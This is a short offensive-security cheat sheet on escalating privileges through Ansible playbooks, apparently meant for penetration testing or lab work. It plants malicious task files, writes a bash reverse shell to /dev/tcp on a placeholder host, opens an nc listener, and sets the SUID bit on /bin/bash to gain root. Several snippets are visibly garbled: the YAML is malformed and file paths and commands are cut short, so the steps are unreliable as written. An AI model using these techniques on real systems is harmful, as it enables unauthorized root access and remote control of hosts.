Ansible Playbook Privilege Escalation

Last modified: 2023-03-14

Privilege Escalation

Ansible Playbooks are lists of tasks that automatically execute against hosts.

PrivEsc with Tasks

First off, check the content of playbook in /opt/ansible/playbooks.
For instance, a file named “httpd.yaml”.

- name: Install and configure Apache
    - role: geerlingguy.apache
    - name: configure firewall

Next, check the content of configure files in /opt/ansible/roles/geerlingguy.apache/tasks.
And add the exploitable file in this.
For example, a file named “shell.yml”.

- hosts: localhost
    - name: RShell
      command: sudo bash /tmp/

Create a exploit for reverse shell.

echo '/bin/bash -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > /tmp/

Then open a listener in local machine.

nc -lvnp <local-port>

At the end, execute “ansible”

# or
# or
sudo -u <some-user> ansible

PrivEsc with Automation Task

If the target system runs automation tasks with Ansible Playbook as root and we have write permission of task files (tasks/), we can inject arbitrary commands in yaml file.
For example, create a new file /opt/ansible/tasks/evil.yaml.

- hosts: localhost
	  - name: Evil |
	      chmod +s /bin/bash
	    become: true

After a while, we can escalate the root privilege by executing the following command.

/bin/bash -p